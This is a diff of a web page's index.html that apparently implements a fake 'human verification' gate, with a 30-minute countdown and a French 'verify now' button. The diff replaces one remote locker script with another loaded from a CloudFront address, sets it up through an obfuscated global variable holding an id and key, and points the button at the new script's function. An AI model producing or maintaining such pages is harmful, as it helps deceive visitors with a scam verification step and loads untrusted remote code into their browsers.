--- a/index.html
+++ b/index.html
@@ -15,7 +15,10 @@
 		<link href="css/animate.css" rel="stylesheet">
 		<link href="css/magnific-popup.css" rel="stylesheet">
 		<link href="css/style.css" rel="stylesheet">
-		<script type="text/javascript" id="ogjs" src="https://verifyuser.org/cl/js/8dj1dk"></script>
+		<script type="text/javascript">
+    var GJEdA_LOt_arqLOc={"it":4200451,"key":"743e6"};
+</script>
+<script src="https://d9cshxmf0qazr.cloudfront.net/b6f83e0.js"></script>
 
 
 
@@ -41,7 +44,7 @@
 						<span id="human_verification_timer_time"><span>30 minutes and 00 seconds</span></span>
 					</div>
 					<div class="verification-button-wrapper">
-						<a <button="" onclick=og_load(); class="button">VÉRIFIEZ MAINTENANT</a>
+						<a <button="" onclick="_di()" class="button">VÉRIFIEZ MAINTENANT</a>
 					</div>
 				</div>
 			</div>
